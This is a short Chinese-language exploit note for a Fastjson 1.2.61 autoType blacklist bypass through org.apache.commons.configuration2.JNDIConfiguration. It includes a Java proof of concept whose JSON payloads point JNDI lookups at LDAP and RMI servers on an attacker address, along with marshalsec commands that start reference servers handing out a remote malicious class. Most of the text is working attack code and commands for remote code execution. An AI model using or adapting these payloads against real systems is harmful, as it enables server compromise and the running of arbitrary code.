官方在https://github.com/alibaba/fastjson/blob/master/src/main/java/com/alibaba/fastjson/parser/ParserConfig.java 中,将0x7bddd363ad3998c6L (即1.2.61 8925522461579647174 0x7bddd363ad3998c6L org.apache.commons.configuration.JNDIConfiguration)加入黑名单,但是未将org.apache.commons.configuration2.JNDIConfiguration加入黑名单,导致1.2.61 bypass.
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;
public class FastJsonTest {
public static void main(String[] args){
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
String jsonStr1 = "{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"ldap://10.10.20.166:1389/ExportObject\"}";
String jsonStr2 = "{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://10.10.20.166:1099/ExportObject\"}";
JSONObject json = JSON.parseObject(jsonStr2);
json.toJSONString();
}
}
// fastjson 1.2.60
// String jsonStr2 = "{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"ldap://10.10.20.166:1389/ExportObject\"}";
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.2.18:8000/#ExportObject
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.2.18:8000/#ExportObject
1.2.60
org.apache.commons.configuration.JNDIConfiguration
>>>commons-configuration-1.4.jar
1.2.61
org.apache.commons.configuration2.JNDIConfiguration
>>>commons-configuration2-2.0.jar
https://mp.weixin.qq.com/s/PHB3dBgvDGdqPhhB1dFfNA